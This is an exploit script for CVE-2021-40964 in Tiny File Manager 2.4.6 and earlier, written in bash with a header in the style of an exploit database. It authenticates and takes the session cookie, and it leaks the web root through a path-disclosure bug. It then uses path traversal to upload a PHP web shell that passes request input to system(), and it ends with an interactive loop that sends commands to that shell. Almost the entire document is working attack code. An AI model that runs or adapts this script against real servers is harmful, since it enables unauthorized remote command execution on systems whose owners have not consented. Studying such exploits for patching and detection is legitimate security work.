# Exploit Title: Tiny File Manager <= 2.4.6 - Remote Code Execution (RCE)
# Exploit Author: Z3R0 (0x30)
# Version: Tiny File Manager <= 2.4.6
# CVE: CVE-2021-40964

#!/bin/bash

check() {
	which curl
	if [ $? = 0 ]
	then
		printf "Curl Found! \n"
	else
		printf "Curl not Found! \n"
		exit
	fi

	which jq
	if [ $? = 0 ]
	then
		printf "jq found! \n"
	else
		printf "jq not found! \n"
		exit
	fi
}

usage() {
	printf "
	Tiny File Manager Authenticated RCE ~ By Z3R0

	$0 <URL> <Admin username> <Admin password>
	"
}

auth() {
	URL=$1
	USER=$2
	PASS=$3

	COOKIE=$(curl "$URL" -X POST -s -d "fm_usr=$USER&fm_pwd=$PASS" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)

	if [ $COOKIE ]
	then
		printf "\n[+] Login Successful! Cookie: $COOKIE \n"
	else
		printf "\n[-] Login Failed! \n"
		exit
	fi
}

get_webroot() {
	WEBROOT=$(curl -X POST "$URL?p=tiny/uploads" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $COOKIE" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/")

	if [ $WEBROOT ]
	then
		printf "\n[*] Try to Leak Web root directory path \n\n"
		printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $WEBROOT \n\n"
	else
		printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
		WEBROOT="/var/www/html"
	fi
}

upload_file() {
	shell="zero_shell$RANDOM.php"
	echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell

	curl "$URL?p=tiny/uploads" -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $COOKIE -F "p=tiny/uploads" -F "fullpath=../../../../../../../..${WEBROOT}/uploads/${shell}" -F "file=@/tmp/$shell" | grep "successful"

}

exploitMe() {
	WEB_URL=${URL}uploads
	echo $WEB_URL

	upload_file

	if [ $? = 0 ]
	then
		printf "[+] File Upload Successful! \n"
	else
		printf "[-] File Upload Unsuccessful! Exiting... \n"
		exit 1
	fi

	printf "[+] Checking for the shell... \n"

	curl "${WEB_URL}/${shell}?cmd=echo%20found" -s | head -1 | grep "found" >/dev/null

	if [ $? = 0 ]
	then
		printf "[+] Shell found ${WEB_URL}/$shell \n"
	else
		printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting... \n"
		exit 2
	fi

	printf "[+] Getting shell access! \n\n"

	while true
	do
		printf "Z3R0~$ "
		read cmd
		curl "${WEB_URL}/$shell" -s -X POST --data-urlencode "cmd=${cmd}"
	done
}

if [ $1 ] && [ $2 ] && [ $3 ]
then
	check
	auth $1 $2 $3
	get_webroot

	exploitMe
else
	usage
fi